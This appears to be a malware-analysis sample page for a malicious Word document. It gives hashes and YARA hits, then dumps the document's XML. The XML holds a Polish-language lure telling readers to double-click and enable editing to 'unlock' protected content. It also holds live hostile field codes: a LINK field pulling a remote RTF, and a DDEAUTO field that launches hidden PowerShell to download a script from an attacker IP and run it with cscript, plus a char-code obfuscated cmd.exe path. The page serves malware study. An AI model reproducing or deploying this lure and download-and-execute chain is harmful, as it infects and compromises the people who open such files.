Sample details: e89d29cfbcbe36b41737dfa3e17a8bbe --

Hashes
MD5: e89d29cfbcbe36b41737dfa3e17a8bbe
SHA1: cbf2b4bb9fbe03d77acc0c3239044eb2e3e29d1f
SHA256: d42fe9da0e97bc7c6816e6c849501c558ed4ed88c59e457af9e42c07b60e7928
SSDEEP: 192:fxmmY+zsPD1gdJMF3fdYyvAv8GyvWFduGFe81JwjCyvWy1lQqOOIZC0:fxmRysr1gdJMFcpuGFe81Jwjh+qSr
Details
File Type: XML
Yara Hits
YRP/domain | YRP/url | YRP/contentis_base64 |
Parent Files
ae571e035b3480f328db6bf66b38ce69
Strings
		<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"><w:body><w:p w:rsidR="00F43DDE" w:rsidRDefault="008840C5" w:rsidP="00923A2A"><w:pPr><w:widowControl w:val="0"/><w:autoSpaceDE w:val="0"/><w:autoSpaceDN w:val="0"/><w:adjustRightInd w:val="0"/><w:jc w:val="center"/><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:sz w:val="56"/><w:szCs w:val="56"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:noProof/><w:sz w:val="56"/><w:szCs w:val="56"/></w:rPr><w:pict><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"><v:stroke joinstyle="miter"/><v:formulas><v:f eqn="if lineDrawn pixelLineWidth 0"/><v:f eqn="sum @0 1 0"/><v:f eqn="sum 0 0 @1"/><v:f eqn="prod @2 1 2"/><v:f eqn="prod @3 21600 pixelWidth"/><v:f eqn="prod @3 21600 pixelHeight"/><v:f eqn="sum @0 0 1"/><v:f eqn="prod @6 1 2"/><v:f eqn="prod @7 21600 pixelWidth"/><v:f eqn="sum @8 21600 0"/><v:f eqn="prod @7 21600 pixelHeight"/><v:f eqn="sum @10 21600 0"/></v:formulas><v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/><o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_s1031" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:-868.25pt;margin-top:-897.3pt;width:1584.95pt;height:1583.9pt;z-index:251658240"><v:imagedata r:id="rId8" o:title=""/></v:shape><o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_s1031" DrawAspect="Icon" ObjectID="_1629312601" r:id="rId9"/></w:pict></w:r><w:r w:rsidR="00923A2A" w:rsidRPr="00923A2A"><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:sz w:val="56"/><w:szCs w:val="56"/><w:highlight w:val="cyan"/></w:rPr><w:t>CHRONIONY DOKUMENT</w:t></w:r></w:p><w:p w:rsidR="00923A2A" w:rsidRDefault="00923A2A" w:rsidP="00923A2A"><w:pPr><w:widowControl w:val="0"/><w:autoSpaceDE w:val="0"/><w:autoSpaceDN w:val="0"/><w:adjustRightInd w:val="0"/><w:jc w:val="center"/><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:color w:val="C00000"/><w:sz w:val="36"/><w:szCs w:val="36"/></w:rPr></w:pPr><w:r w:rsidRPr="00923A2A"><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:color w:val="C00000"/><w:sz w:val="36"/><w:szCs w:val="36"/></w:rPr><w:t>TEN DOKUMENT JEST CHRONIONY PRZEZ MI</w:t></w:r><w:r><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:color w:val="C00000"/><w:sz w:val="36"/><w:szCs w:val="36"/></w:rPr><w:t>CROSOFT OFFICE I WYMAGA POTWIERDZENIA, 
E NIE ZOSTA
NIEJ OTWARTY PRZEZ OSOBY NIE POWO
ANE.</w:t></w:r></w:p><w:p w:rsidR="00923A2A" w:rsidRDefault="00923A2A" w:rsidP="00923A2A"><w:pPr><w:widowControl w:val="0"/><w:autoSpaceDE w:val="0"/><w:autoSpaceDN w:val="0"/><w:adjustRightInd w:val="0"/><w:jc w:val="center"/><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:color w:val="C00000"/><w:sz w:val="36"/><w:szCs w:val="36"/></w:rPr></w:pPr></w:p><w:p w:rsidR="00923A2A" w:rsidRDefault="00217B30" w:rsidP="00923A2A"><w:pPr><w:widowControl w:val="0"/><w:autoSpaceDE w:val="0"/><w:autoSpaceDN w:val="0"/><w:adjustRightInd w:val="0"/><w:jc w:val="center"/><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:color w:val="C00000"/><w:sz w:val="36"/><w:szCs w:val="36"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:noProof/><w:color w:val="C00000"/><w:sz w:val="36"/><w:szCs w:val="36"/></w:rPr><w:drawing><wp:inline distT="0" distB="0" distL="0" distR="0"><wp:extent cx="2533650" cy="1800225"/><wp:effectExtent l="19050" t="0" r="0" b="0"/><wp:docPr id="2" name="Picture 0" descr="images.jpg"/><wp:cNvGraphicFramePr><a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/></wp:cNvGraphicFramePr><a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"><a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:nvPicPr><pic:cNvPr id="0" name="images.jpg"/><pic:cNvPicPr/></pic:nvPicPr><pic:blipFill><a:blip r:embed="rId10"/><a:stretch><a:fillRect/></a:stretch></pic:blipFill><pic:spPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="2533650" cy="1800225"/></a:xfrm><a:prstGeom prst="rect"><a:avLst/></a:prstGeom></pic:spPr></pic:pic></a:graphicData></a:graphic></wp:inline></w:drawing></w:r></w:p><w:p w:rsidR="00923A2A" w:rsidRDefault="00923A2A" w:rsidP="00923A2A"><w:pPr><w:widowControl w:val="0"/><w:autoSpaceDE w:val="0"/><w:autoSpaceDN w:val="0"/><w:adjustRightInd w:val="0"/><w:jc w:val="center"/><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:color w:val="C00000"/><w:sz w:val="36"/><w:szCs w:val="36"/></w:rPr></w:pPr></w:p><w:p w:rsidR="00923A2A" w:rsidRDefault="00923A2A" w:rsidP="00217B30"><w:pPr><w:widowControl w:val="0"/><w:autoSpaceDE w:val="0"/><w:autoSpaceDN w:val="0"/><w:adjustRightInd w:val="0"/><w:jc w:val="center"/><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:color w:val="C00000"/><w:sz w:val="36"/><w:szCs w:val="36"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:color w:val="C00000"/><w:sz w:val="36"/><w:szCs w:val="36"/></w:rPr><w:t xml:space="preserve">Kliknij Dwukrotnie tutaj aby odblokowa
 zawarto
 </w:t></w:r><w:r w:rsidR="00375771"><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:color w:val="C00000"/><w:sz w:val="36"/><w:szCs w:val="36"/></w:rPr><w:t>chroni
 przez SSL</w:t></w:r><w:r><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:color w:val="C00000"/><w:sz w:val="36"/><w:szCs w:val="36"/></w:rPr><w:t xml:space="preserve">. </w:t></w:r></w:p><w:p w:rsidR="00217B30" w:rsidRDefault="00217B30" w:rsidP="00217B30"><w:pPr><w:pStyle w:val="ListParagraph"/><w:widowControl w:val="0"/><w:numPr><w:ilvl w:val="0"/><w:numId w:val="1"/></w:numPr><w:autoSpaceDE w:val="0"/><w:autoSpaceDN w:val="0"/><w:adjustRightInd w:val="0"/><w:jc w:val="center"/><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:sz w:val="28"/><w:szCs w:val="28"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:sz w:val="28"/><w:szCs w:val="28"/></w:rPr><w:t>Otw
rz dokument w pakiecie Microsoft Office. Podgl
d w trybie online nie dzia
a w przypadku dokument
w chronionych.</w:t></w:r></w:p><w:p w:rsidR="00217B30" w:rsidRDefault="00217B30" w:rsidP="00217B30"><w:pPr><w:pStyle w:val="ListParagraph"/><w:widowControl w:val="0"/><w:numPr><w:ilvl w:val="0"/><w:numId w:val="1"/></w:numPr><w:autoSpaceDE w:val="0"/><w:autoSpaceDN w:val="0"/><w:adjustRightInd w:val="0"/><w:jc w:val="center"/><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:sz w:val="28"/><w:szCs w:val="28"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:sz w:val="28"/><w:szCs w:val="28"/></w:rPr><w:t>Je
li ten dokument, zosta
 pobrany z adresu e-mail, kliknij w
cz edycj
.</w:t></w:r></w:p><w:p w:rsidR="00217B30" w:rsidRDefault="00217B30" w:rsidP="00217B30"><w:pPr><w:pStyle w:val="ListParagraph"/><w:widowControl w:val="0"/><w:numPr><w:ilvl w:val="0"/><w:numId w:val="1"/></w:numPr><w:autoSpaceDE w:val="0"/><w:autoSpaceDN w:val="0"/><w:adjustRightInd w:val="0"/><w:jc w:val="center"/><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:sz w:val="28"/><w:szCs w:val="28"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:sz w:val="28"/><w:szCs w:val="28"/></w:rPr><w:t>Kliknij dwukrotnie powy
ej, tre
 tego dokumentu zostanie ujawniona.</w:t></w:r></w:p><w:p w:rsidR="002829F0" w:rsidRDefault="00FD3B90" w:rsidP="00EF1DA9"><w:pPr><w:pStyle w:val="ListParagraph"/></w:pPr><w:r><w:lastRenderedPageBreak/><w:fldChar w:fldCharType="begin"/></w:r><w:r><w:instrText xml:space="preserve"> LINK Word.Document.8 "http://23.106.123.105/new.rtf" "" \a \p \f 0 </w:instrText></w:r><w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:object w:dxaOrig="9406" w:dyaOrig="509"><v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:470.45pt;height:25.65pt"><v:imagedata r:id="rId11" o:title=""/></v:shape></w:object></w:r><w:r><w:fldChar w:fldCharType="end"/></w:r><w:r><w:fldChar w:fldCharType="begin"/></w:r><w:r w:rsidR="00EF1DA9"><w:instrText xml:space="preserve"> DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -w hidden -nop -ep bypass -Command (new.object System.Net.WebClient).DownloadFile('http://23.106.123.105/Crypted.js','Crypted.js'); &amp; start c:\\Windows\\System32\\cmd.exe /c cscript.exe Crypted.js" </w:instrText></w:r><w:r><w:fldChar w:fldCharType="end"/></w:r><w:r><w:fldChar w:fldCharType="begin"/></w:r><w:r w:rsidR="002829F0"><w:instrText>SET c"</w:instrText></w:r><w:fldSimple w:instr="  QUOTE  99 58 92 87 105 110 100 111 119 115 92 83 121 115 116 101 109 51 50 92 99 109 100 46 101 120 101  "><w:r w:rsidR="002829F0"><w:instrText>c:\Windows\System32\cmd.exe</w:instrText></w:r></w:fldSimple><w:r w:rsidR="002829F0"><w:instrText>"</w:instrText></w:r><w:r><w:fldChar w:fldCharType="separate"/></w:r><w:bookmarkStart w:id="0" w:name="c"/><w:r w:rsidR="002829F0"><w:rPr><w:noProof/></w:rPr><w:t>c:\Windows\System32\cmd.exe</w:t></w:r><w:bookmarkEnd w:id="0"/><w:r><w:fldChar w:fldCharType="end"/></w:r></w:p><w:p w:rsidR="002829F0" w:rsidRDefault="002829F0" w:rsidP="00EF1DA9"><w:pPr><w:ind w:left="360"/></w:pPr><w:bookmarkStart w:id="1" w:name="_GoBack"/><w:bookmarkEnd w:id="1"/></w:p><w:p w:rsidR="002829F0" w:rsidRPr="00217B30" w:rsidRDefault="002829F0" w:rsidP="002829F0"><w:pPr><w:pStyle w:val="ListParagraph"/><w:widowControl w:val="0"/><w:autoSpaceDE w:val="0"/><w:autoSpaceDN w:val="0"/><w:adjustRightInd w:val="0"/><w:rPr><w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cs="Calibri"/><w:sz w:val="28"/><w:szCs w:val="28"/></w:rPr></w:pPr></w:p><w:sectPr w:rsidR="002829F0" w:rsidRPr="00217B30" w:rsidSect="00FA3896"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/><w:cols w:space="708"/><w:noEndnote/></w:sectPr></w:body></w:document>